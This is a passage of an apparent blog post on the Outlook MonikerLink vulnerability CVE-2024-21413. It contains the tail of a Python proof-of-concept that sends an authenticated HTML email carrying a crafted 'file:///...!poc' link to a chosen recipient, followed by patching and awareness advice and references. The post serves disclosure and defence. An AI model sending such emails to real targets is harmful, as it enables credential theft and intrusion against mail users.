8+8L5qJwfy/Bx71HNTttKqYIbgZf0ToNdAxmxxFosSGCRF3cQnOgV0rOVMnRS0I5qA5aI5cdoOaCXkQ8TzCtqJ7wVmONCnxMqFlM4zQamnYqiAIqlILoYumL8oxmDqsCQuRq9jti7pkgv3nR/t2hAn6ZNwWoOuR61kY5zDuxRnnORPTHYyo5okYSsqW+XUgH7zrllXDZ0FEwfzKR36mB9PcrYi7w8aemYf1MSLmoImgYqS8yw+cKphnVHv4qjXkdg4b5UYb25zkfRs1rlz5YLBbxS9h0FqSN3xqQGchfVahMYX5Jvk+h4LjzcqCuPgf9U8p7vSLI9+spqLBSJZZ8dREOepC9J9+JXiy9PeDYtfCxRsJf49inguUNyfSi98bGK/mt8sMwSamIN8i3JOuxJlSV4/fFsPyA+2n2e6NKrMhX7doH65jToKIRK4vRtykWMjNwb4pgB6n7pwyzJ1VBKkn8yaytSjhAk9jm7VX2ZC6Nez80Ah1ees+K6vK64x7SdFvge1HEbh07BMQgvdlz7Q+4pMehRYhhRiOYQS9h9oSgOYbno0O2WvnXLK5HH2fD9Ka3mvsY/WyEb0f+y6YAgagKBIOoxGo4668OPuKfsSarA/ily4Qgyusp7qE5U2piAnzUAUZgZkMkWnmg7VbT+8BWTd/wYgc1c/FYFcvv197N14hhcjWlZChTyDEOekMb6Ces/tId/4M9aXcmYjQaU+XnbM4G/zAG7XK8FZhLGWM3tJF+wuov3fEb26UPRss6vP9u5eDQFtD+GEzLjc6d69zOOjgGCw21bmMdHIM5ODgGc3BwcAzm4NAm8R8BBgAGrc+T79nGEQAAAABJRU5ErkJggg=="

    html = f"""\
    <html>
    <body>
        <img src="{base64_image_string}" alt="Image"><br />
        <h1><a href="file:///{link_url}!poc">CVE-2024-21413 PoC.</a></h1>
    </body>
    </html>
    """

    part1 = MIMEText(text, 'plain')
    part2 = MIMEText(html, 'html')
    msg.attach(part1)
    msg.attach(part2)

    try:
        with smtplib.SMTP(smtp_server, port) as server:
            server.ehlo()
            server.starttls()
            server.ehlo()
            server.login(username, password)
            server.sendmail(sender_email, recipient_email, msg.as_string())
            print(f"{GREEN}✅ Email sent successfully.{ENDC}")
    except Exception as e:
        print(f"{RED}❌ Failed to send email: {e}{ENDC}")

def main():
    display_banner()
    parser = argparse.ArgumentParser(description="PoC for CVE-2024-21413 with SMTP authentication.")
    parser.add_argument('--server', required=True, help="SMTP server hostname or IP")
    parser.add_argument('--port', type=int, default=587, help="SMTP server port")
    parser.add_argument('--username', required=True, help="SMTP server username for authentication")
    parser.add_argument('--password', required=True, help="SMTP server password for authentication")
    parser.add_argument('--sender', required=True, help="Sender email address")
    parser.add_argument('--recipient', required=True, help="Recipient email address")
    parser.add_argument('--url', required=True, help="Malicious path to include in the email")
    parser.add_argument('--subject', required=True, help="Email subject")


    args = parser.parse_args()

    send_email(args.server, args.port, args.username, args.password, args.sender, args.recipient, args.url, args.subject)

if __name__ == "__main__":
    if len(sys.argv) == 1:
        display_banner()
        sys.exit(1)
    main()

Why SMTP Authentication Matters

The use of SMTP authentication in this exploit is pivotal, as it mirrors the tactics employed by sophisticated cyber attackers to navigate around established email security protocols.

By authenticating the email, attackers can give the appearance of legitimacy, increasing the likelihood of their malicious email being received and acted upon by the target.

This approach underscores the vulnerability’s criticality and the need for comprehensive security measures beyond standard email validation checks.

Protecting Against CVE-2024–21413

In response to the disclosure of CVE-2024–21413, Microsoft has released patches to mitigate the vulnerability.

Users and IT administrators are urged to apply these updates promptly to protect against potential exploits. The following measures are also recommended to enhance security:

Update Regularly: Ensure that your Microsoft Office suite is up-to-date with the latest security patches.
Educate Users: Raise awareness among users about the risks of phishing emails and the importance of caution when dealing with unexpected emails.
Implement Advanced Security Solutions: Utilize email security solutions that offer advanced threat protection capabilities, including scanning of email attachments and links for malicious content.

Conclusion

CVE-2024–21413 is a stark reminder of the importance of cybersecurity vigilance. As cyber threats continue to evolve, staying informed and prepared is key to protecting sensitive information and systems.

By understanding the nature of such vulnerabilities and taking proactive steps to mitigate them, individuals and organizations can significantly reduce their risk of falling victim to cyberattacks.

Don’t forget to clap 👏 and follow for more updates on cybersecurity trends and insights!

For further reading on CVE-2024–21413 and detailed technical guidance, visit Microsoft’s official advisory and cybersecurity platforms that offer real-time updates on vulnerabilities and threats.

Follow me on Medium (it helps :D) with:

Stay tuned to my publishes! :D (ElNiak)

Stay tuned to my publishes! :D (ElNiak) 🔐💪 Unlock the Power of Knowledge with ElNiak on Medium! Dive into the dynamic…

medium.com

My Twitter to follow

My LinkedIn

My GitHub account to follow:

ElNiak - Overview

I'm a cybersecurity researcher and teaching assistant at UCLouvain. - ElNiak

github.com

References:

Microsoft Security Response Center: For official advisories, patch information, and detailed descriptions of CVE-2024–21413. https://portal.msrc.microsoft.com/en-US/security-guidance
GitHub PoC Repository: Contains the proof of concept script and detailed explanation for CVE-2024–21413 exploitation. https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
Checkpoint Research: Offers an in-depth analysis of the #MonikerLink bug, exploring its implications and the broader cybersecurity landscape. https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/